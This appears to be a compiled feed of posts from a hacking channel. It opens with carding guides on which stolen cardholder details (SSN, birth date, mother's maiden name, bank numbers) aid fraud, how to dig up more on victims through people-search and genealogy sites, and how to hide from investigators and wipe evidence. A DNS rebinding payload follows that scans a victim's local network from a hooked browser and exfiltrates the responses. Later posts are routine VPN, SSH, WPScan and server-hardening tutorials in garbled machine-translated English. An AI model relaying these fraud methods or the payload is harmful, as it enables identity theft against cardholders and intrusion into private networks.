▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Carding 2020
FRAUD WITH SS. KEY INFORMATION
Instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) I want to clarify right now. The secret in carding is not the number of cards that you own, but what you can do with these cards. What I mean? Everything is very simple.

2) Hypothetical situation: My name is Johnny and I have 3 SSs with SSN, DOB, CVV NUMBER, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TELEPHONE NUMBER. And also

3) I have a friend whose name is Billy with 300mi SS with CVV, MMN, NAME, STREET ADDRESS, CITY, ZIP, AND BILLING TEL. NUMBER Who is more likely to get something?


4) Simply put, I (Johnny). Why? Because I have more information that can prove that I am the person who owns these SSs than the one that three hundred Billy cards have.


5) Does this mean that Billy will not get a damn thing from his cards? No, it just means that Billy will have a hard time carding with checks.


6) Thus, to summarize this example, you should have as much information as possible on the card holder. The first rule of carding: the more information you have on the victim, the more


you have a chance of success. Here is the information you need to know (note: "card level" is not a technical term in carding, you just use L1, L2, L3 to



NAME:

ADDRESS:

CITY:

STATE:

ZIP CODE:

Tel. BILLING NUMBER:

CARD NUMBER:

CARD EXP DATE:

CVV CODE:


🦑 Ordinary CVV. If you have this information, then you are the owner of an ordinary SS. Currently, it is worth noting that this is a necessary minimum of information to work in


Social Security Number (SSN):

Date Of Birth (DOB):

Mothers Maide Name (MMN):

🦑 Partial Fulka. If you have this information, then you have a higher-level SS. With this information you should be able to card PayPal, c2it and some

BANK ACCOUNT NUMBER:

ROUTING NUMBER:

BANK NAME:

BANK NUMBER:

DRIVERS LICENSE NUMBER:

PIN NUMBER (For CC or ATM card)

🦑 next . If you have all this information, then with your SS you can junk everything your heart desires)

> Now, if all you have is ordinary SS, don't be upset. Just do some work (search) to increase the level of your map:

1) First of all, go to whitepages.com and try to find out the address and phone number of the cardholder. Make sure that all this really belongs to the cardholder.

2) Further. There is an excellent service called "Phantominfo" ( http://www.phantominfo.com, its owner lives on the SC forum), which will help you find information for your SSs such as SSN and

3) DOB for only $ 29 / month. Of course, many carders have PI accounts, so you can always ask for help.

4) And last but not least, a quick look at ancestry.com. Ancestry.com, this is a piece of whore, but you can find DOB and MMN (i.e. if your cardholder is called xy)

5) his father David x and his mother's name is Bella y, and Donna is MMN)

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑IMPROVEMENT OF ANONYMITy For Carding
instagram.com/UndercodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Security is a key factor. Nobody needs the federals to rediscover all of us here, therefore we should be as anonymous as possible.

2) First of all, I must say that there is no 100% anonymity in carding. Do not let people fool you with promises of complete anonymity. You can use everything: proxy,

3) Wingates, Sox and hell knows what else, but you will always set aside “digital fingerprints” wherever you are. For my personal purposes, I use a bore ISP in combination with

4) an anonymizer account ( http://anonymizer.com ) and a first level proxy. But I do not recommend repeating this to everyone.

> http://anonymizer.com offers excellent services for those who want to remain anonymous. The trouble is that this is a service, and like in another service you will have to pay for it, plus in case

5) what they can hand you over. If you plan to use anonymizer, you just need to focus on keeping your IP secret from the anonymizer, and not from the site on which you

cardite.

6) Proxies and stuff: I use private hidden proxies, and I really don’t fuck with the rest of the proxies, so I can say not so much on this topic (maybe someone can

7) get free proxies at http://anonymitycheker.com/page1.htm, they also test proxies and other crap in real time there.

8) Stealther: These programs will help connect your proxies for maximum anonymity. Stealthers are registered using the key (so you will need to go to "UndercodeTesting

9) EvidenceEliminator: If you really seriously decided to do carding, then this program MUST be on your hard drive ANYWHERE! The feds have some

10) programs that help them extract interesting information for them, for example, the pages you visited, the files you deleted, and the emails you wrote. Each time when your computer restarts, E.E. It works by providing you security by erasing all logs and file history. You have to prepare for the best.

11) JAVA: Enemy Carder. It should always be disabled in your browser.

12) CARDED ISP: Honestly, I'm not sure if carding in ISP is safe. I have heard many different reviews about this idea. However, I can testify that I had experience

13) there was still no problem working with this case. Some popular ISPs are charged with Earthlink Pre-paid (you can pay for this service for a year, see the link on their websites) and America Online.

14) These are not the only options to ensure anonymity, only the most popular. If it seems to you that you have come across a working way to secure anonymity for yourself -

> use it anyway. You will never know what works and what doesn't until you try.

15) If you want to find out how well you have protected yourself, take the following tests:

> http://www.whatismyip.com: this is the first and main test. whatismyip.com is an easy way to find out which IP you are currently online on. JAVA doesn’t work here, so you can’t after

16) Successful passage consider yourself safe.

WRITTEN BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

T.me/UndercOdeTesting
# SUPPORT & SHARE

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑DNS Rebinding Exploitation Framework 2019 updated :
t.me/UndercOdeTesting

dref does the heavy-lifting for DNS rebinding. The following snippet from one of its built-in payloads shows the framework being used to scan a local subnet from a hooked browser; after identifying live web services it proceeds to exfiltrate GET responses, breezing through the Same-Origin policy:

// mainFrame() runs first
async function mainFrame () {
// We use some tricks to derive the browser's local /24 subnet
const localSubnet = await network.getLocalSubnet(24)

// We use some more tricks to scan a couple of ports across the subnet
netmap.tcpScan(localSubnet, [80, 8080]).then(results => {
// We launch the rebind attack on live targets
for (let h of results.hosts) {
for (let p of h.ports) {
if (p.open) session.createRebindFrame(h.host, p.port)
}
}
})
}

// rebindFrame() will have target ip:port as origin
function rebindFrame () {
// After this we'll have bypassed the Same-Origin policy
session.triggerRebind().then(() => {
// We can now read the response across origin...
network.get(session.baseURL, {
successCb: (code, headers, body) => {
// ... and exfiltrate it
session.log({code: code, headers: headers, body: body})
}
})
})
}

@UNDERCODEOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Secure Traffic Between VPS Using OpenVPN ?
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

> You'll need at least two droplets or VPS for this OpenVPN setup, and will work up to around 60 VPS without major modifications. So to get started, create two droplets. For the rest of this tutorial, I'll refer to them as Droplet 1 and Droplet 2.

🦑 On Droplet 1

1) Create the droplet with Ubuntu 13.04 x32.

> This should work without modification on any version of Ubuntu that DigitalOcean offers, but was only tested on 13.04.

2) Connect to the VPS via secure shell. We're going to update packages and install a few things.

3) aptitude update

4) aptitude dist-upgrade -y

5) aptitude install openvpn firehol -y && reboot

6) if your shell goes purple during this, just choose "Install Package Maintainer's Version" twice.

🦑 Meanwhile, on Droplet 2

1) Create the droplet with Ubuntu 13.04 x32.

2) Again, this should work on any version of Ubuntu.

> Connect to the VPS via secure shell. We're going to update packages in install a few things.

3) aptitude update

4) aptitude dist-upgrade -y

5) aptitude install openvpn -y && reboot

6) Again, if your shell goes purple during this, just choose "Install Package Maintainer's Version" twice.

🦑 Now Generating the Keys:

> The key generation is going to be done exclusively on Droplet 1. Type the following commands into the shell:

1) cd /etc/openvpn/

2) mkdir easy-rsa

3) cd easy-rsa

4) cp -r /usr/share/doc/openvpn/examples/easy-rsa/2.0/* .

5) Next, we're going to type in some presets which will vastly speed up the key generation process. Type the following command:

6) nano /etc/openvpn/easy-rsa/vars

70 Go ahead and edit the following values (you only need do to these, although there are several more present

KEY_COUNTRY
KEY_PROVINCE
KEY_CITY
KEY_ORG and
KEY_EMAIL

8) You may adjust the KEY_SIZE to 2048 or higher for added protection.

9) Save and exit with Control-O, Enter, and Control-X.

Posted BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Create the Certificate Authority Certificate and Key (vps tutorial)
twitter.com/UndercodeTC

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) type the following commands:

source vars
./clean-all
./build-ca

2) You should be able to hit Enter though all of the questions.

Note: if you ever have to go back and create more keys, you'll need to retype source vars but don't type ./clean-all or you'll erase your Certificate Authority, undermining your whole VPN setup.

3) Create Server Certificate and Key

> Generate the server certificate and key with the following command:

4) ./build-key-server server

5) You should be able to hit Enter on defaults, but make sure the Common Name of the certificate is "server".

6) It will ask you to add a pass phrase, but just hit Enter without typing one.

7) When it asks you "Sign the certificate?", type y and hit Enter.

8) When it says "1 out of 1 certificate requests certified, commit?", type y and hit Enter

🦑Tested by UndercOde

Posted BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How To Generate Client Keys (vps tutorial3)

> Next is generating the certificate and keys for the clients. For security purposes, each client will get its own certificate and key.
fb.com/UndercOdeTestingCompany

🦑Example :

1) I'm naming the first client "client1", so if you change this, you'll have to adjust it several times later. So type in the following:

> ./build-key client1

2) As with the server key, when it asks you "Sign the certificate?", type y and hit Enter.

3) When it says "1 out of 1 certificate requests certified, commit?", type y and hit Enter.

4) Go ahead and repeat this for as many clients as you need to make. You can also come back to this later (though remember to "source var" again if you do so).

5) Generate Diffie-Hellman Parameters
This is used after authentication, to determine the encryption parameters. Simply type the following line:

> ./build-dh

6) Copy Keys into Place

7) Next, we copy the various keys and certificates into place on the cloud server:

> cd /etc/openvpn/easy-rsa/keys

> cp ca.crt dh1024.pem server.crt server.key /etc/openvpn

8) It's very important that keys are kept secure. Double check that only root has permission to read. So type:

> ls -lah /etc/openvpn

9) What you're looking for is that server.key has -rw------- for permissions (read/write for owner, none for group, and none everyone). If you need to change it, use this command:

> chmod 600 /etc/openvpn/server.key

Posted BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Now Lets generate a ssh for secure a server :
> example we have two clients :
T.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) On Droplet 1
Generate SSH keys with the following command:

> ssh-keygen -t rsa

2) It will choose a default filename and then ask you for a secure passphrase, which you should set. Find the SSH public key you just generated and type:

> cat ~/.ssh/id_rsa.pub

3) Copy the results onto the clipboard. It's a few lines of letters and numbers looking like:

> ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo249TgbI1gYP42RbLcDhsNN28r/fNT6ljdFOZxhk+05UAPhxq8bASaqSXZI3K8EEI3wSpigaceNUu65pxLEsZWS8xTtjY4AVxZU2w8GIlnFDSQYr3M2A77ZAq5DqyhGmnnB3cPsIJi5Q6JQNaQ/Meg1v7mYR9prfEENJeXrDiXjxUqi41NlVdb5ZQnPL1EdKM+KN/EPjiTD5XY1q4ICmLJUB8RkffHwH2knEcBoSZW2cNADpMu/IqtxTZpFL0I1eIEtoCWg4mGIdIo8Dj/nzjheFjavDhiqvUEImt1vWFPxHEXt79Iap/VQp/yc80fhr2UqXmxOa0XS7oSGGfFuXz root@openvpn1

4) But USE YOUR OWN, not mine. Your id_rsa.pub doesn't need to be kept secure, but if you use the key above, that would allow me access to your VPS.

5) Meanwhile, on Droplet 2
cd ~/.ssh
(If you get an error, create the folder with mkdir ~/.ssh).

nano authorized_keys

6) Paste the public key that is in your clipboard onto a new line, then save and exit with Control-O, Enter, Control-X.

7) Back to Droplet 1
Next, we copy the appropriate keys onto the second server:
scp /etc/openvpn/easy-rsa/keys/ca.crt \
/etc/openvpn/easy-rsa/keys/client1.crt \
/etc/openvpn/easy-rsa/keys/client1.key \
root@droplet2ip:~/

8) It will ask you "Are you sure you want to continue connecting (yes/no)?", so type yes and hit Enter.

> Then input the passphrase you've just created.

🦑 Switching again to Droplet 2 :

1) Next, we move the certificates and keys into their final location:

cd ~
mv ca.crt client1.crt client1.key /etc/openvpn
ls -l /etc/openvpn

2) As the key must be kept secure, let's make sure client1.key has the correct permissions (-rw-------).

3) Again, if need be, the permissions can be reset with the following command:

> chmod 600 /etc/openvpn/client1.key

@UNDERCODEOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 How to install and run WPScan on Windows
> WPScan is a vulnerability scanner for WordPress powered sites. It works on the principle of a “black box”, that is, without access to the source code. It can be used to crawl remote WordPress sites for security issues.
t.me/UndercOdeTesting

🦑The vulnerability search process is as follows:

1) Installed plugins and themes are searched for for the specified site.

2) Since plugins are placed in the same folders on all sites, you can determine the availability of the plugin by making a request to a specific file. Attempts are also being made to determine the versions for plugins and detected themes.

3) If the plugin is found, then the database checks if there are vulnerabilities for it.

4) Additionally, the version of WordPress is determined and known vulnerabilities are displayed.

5) Backup files and databases are also searched, the robots.txt file is analyzed, a list of users and other information useful to the site security auditor are displayed.

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) WPScan is usually used on Linux, this program is already preinstalled on distributions such as Kali Linux and BlackArch. WPScan is written in Ruby and can be run on any operating system that supports Ruby, including Windows. When using WPScan in Windows, there are some nuances that will be discussed later.

2) To install WPScan on Windows, you need to start by installing Ruby , as described in this article .

3) Then do a WPScan search among the gem packages:

> gem search WPScan

> gem install wpscan

4) Now you need to update the WPScan database with information about plugins and WordPress themes:

> wpscan --update --disable-tls-checks

5) If the error “Could not open library 'libcurl.dll', 'libcurl.so.4', 'libcurl.so.dll'” occurs during startup, the continue:
if works stop (depend on win version)

6) To run WordPress site crawls on Windows using WPScan, run a command of the form

To run WordPress site awls on Windows using WPScan, run a command of the form:

> wpscan --url https://sitename.com --random-user-agent --disable-tls-checks

Written BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Why WPScan does not show vulnerabilities. How to get WPVulnDB API
WPScan used to output versions of found plugins and themes, and if a plugin or theme has vulnerabilities, then output them. Now WPScan only shows versions of WordPress, plugins and themes, but does not display vulnerabilities. Instead, the following messages are shown at the end of the scan
instagram.com/UndercodeTestingCompany

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) No WPVulnDB API Token given, as a result vulnerability data has not been output.

2) You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.

3) They say that the WPVulnDB API is not defined, so there is no information about vulnerabilities in the output. You can get a free API that gives you the right to make 50 requests per day. To do this, just
> register at https://wpvulndb.com/users/sign_up .

4) There is no catch — just go ahead, register and get your free token.

5) Then add the --api-token option to the command to run :

> wpscan --url https://URLexanple --random-user-agent --disable-tls-checks --api-token API_

Written BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑ITWSV- Integrated Tool for Web Security Vulnerability linux tool : updated 2019
t.me/UndercOdeTesting

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) git clone https://github.com/penetrate2hack/ITWSV.git

2) cd ITWSV

3) chmod +x start.sh

4) chmod +x update.sh (only if required)

5) ./start.sh

🦑Features :

WHOIS

DNSWALK

FIERCE

DNSRecon

DNSenum

NMAP

DMitry

theHarvester

LBD

SSLScan

SSLYze

WhatWeb

Automater

Grabber

Parsero

Uniscan

Metagoofil

A2SV

WPScan

Droopescan

WPSeku

XssPy

Spaghetti

sublist3r

WAFW00F

nslookup

nslookup

dirsearch

OWASP Joomscan

Spaghetti

Globuster

Grabber

OTHER TOOLS
Pureblood

Wapiti

Lscript

Trity
Written BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑to know Python you must know those topic :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In-Place Swapping Of Two Numbers.

2) Reversing a string in Python.

3) Create a single string from all the elements in list.

4 )Chaining Of Comparison Operators.

5) Print The File Path Of Imported Modules.

6) Use Of Enums In Python.

7) Return Multiple Values From Functions.

8) Find The Most Frequent Value In A List.

Written BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑to know Python you must know those topic :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) In-Place Swapping Of Two Numbers.

2) Reversing a string in Python.

3) Create a single string from all the elements in list.

4 )Chaining Of Comparison Operators.

5) Print The File Path Of Imported Modules.

6) Use Of Enums In Python.

7) Return Multiple Values From Functions.

8) Find The Most Frequent Value In A List.

Written BY UNDERCODE
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑What is Unauthorized access ?
twitter.com/UNDERCODEtc

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Unauthorized access is when someone gains access to a website, program, server, service, or other system using someone else's account or other methods. For example, if someone kept guessing a password or username for an account that was not theirs until they gained access, it is considered unauthorized access.

2) Unauthorized access could also occur if a user attempts to access an area of a system they should not be accessing. When attempting to access that area, they would be denied access and possibly see an unauthorized access message.

3) Some system administrators set up alerts to let them know when there is an unauthorized access attempt, so that they may investigate the reason. These alerts can help stop hackers from gaining access to a secure or confidential system. Many secure systems may also lock an account that has had too many failed login attempts.

@UndercOdeOfficial

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Preventing unauthorized access :
t.me/UndercodeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

You may be alerted to a security incident in the media, such as the discovery of the Heartbleed bug, or your computer could be stolen while you're signed in to GitHub. In such cases, changing your password prevents any unintended future access to your account and projects.

1) GitHub requires a password to perform sensitive actions, such as adding new SSH keys, authorizing applications, or modifying team members.

2) After changing your password, you should perform these actions to make sure that your account is secure:

3) Enable two-factor authentication on your account so that access requires more than just a password.

4) Review your SSH keys, deploy keys, and authorized integrations and revoke unauthorized or unfamiliar access in your SSH and Applications settings.

5) Verify all your email addresses. If an attacker added their email address to your account, it could allow them to force an unintended password reset.

6) Review your account's security log. This provides an overview on various configurations made to your repositories. For example, you can ensure that no private repositories were turned public, or that no repositories were transferred.

7) Review the service hooks on your repositories. Service hooks could allow an attacker to intercept pushes made to your repository.

8) Make sure that no new deploy keys were created. This could enable outside servers access to your projects.

9) Review recent commits made to your repositories.

10) Review the list of collaborators for each repository

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑The task is to install pypi on windows :
instagram.com/UndercOdeTestingCompany

🦑𝕀ℕ𝕊𝕋𝔸𝕃𝕃𝕀𝕊𝔸𝕋𝕀𝕆ℕ & ℝ𝕌ℕ:

1) I had python 2.7 installed

2) Take pypi from here link
> https://pypi.org/project/jaraco.windows/

3) Unpack in c: pypi for example

4) Next, open cmd :

> cd c: pypi

> C: Python27python.exe setup.py install

5) Open a new cmd :

6) Let's check on :

pip install exampletool

@UndercOdeTesting
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Asterisk and security :
t.me/UndercOdeTesting

🦑 𝕃𝔼𝕋𝕊 𝕊𝕋𝔸ℝ𝕋 :

1) Custom port instead of 5060

2) The port is configured in the sip.conf file in the [general] section : bindport = 5060 => bindport = 5071

3) Disable guest calls

4) If you do not need to receive calls without registering, turn off the following option in sip.conf:
allowguest = yes => allowguest = no

5) Turn off the notification of the wrong password

5) Change the option in sip.conf:
alwaysauthreject = no => alwaysauthreject = yes

6) We use complex passwords for accounts

7) Remove all passwords matching logins

secret = Vad34 @ QW545!

8) We use deny / permit for accounts

9) We indicate for all accounts that do not imply an Internet connection the following lines:
@UndercOdeTesting

[100]
...
deny = 0.0.0.0 / 0.0.0.0
permit = 10.1.1.1 / 24
permit = 10.1.2.1 / 24

Set the call limit:

[100]
call-limit = 1

10) We do not use default extension. All that should be in default:

[default]
exten => _X., 1, Hangup

11) We do not make one universal rule for all calls:
exten => _X., 1, Dial (SIP / $ {EXTEN} @ operator)

12) We write down clearly all the necessary combinations of numbers transmitted to the operator :;
Emergency services
exten => _0X, 1,
Dial (SIP / $ {EXTEN} @ operator)
exten => _0X, n, Hangup


; Melbourn
exten => _.,..XXXXX, 1,
Dial (SIP / $ {EXTEN} @ operator)
exten => _..XXXXX, n, Hangup
exten => _...XXXXXX, 1,
Dial (SIP / $ {EXTEN} @ operator)
exten => _...XXXXX , n, Hangup
exten => _XXXXXXX, 1,
Dial (SIP / $ {EXTEN} @ operator)
exten => _..XXXXX, n, Hangup


; Intercity Austraia / Mobile
exten => 61...

@UndercOdeOfficial
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁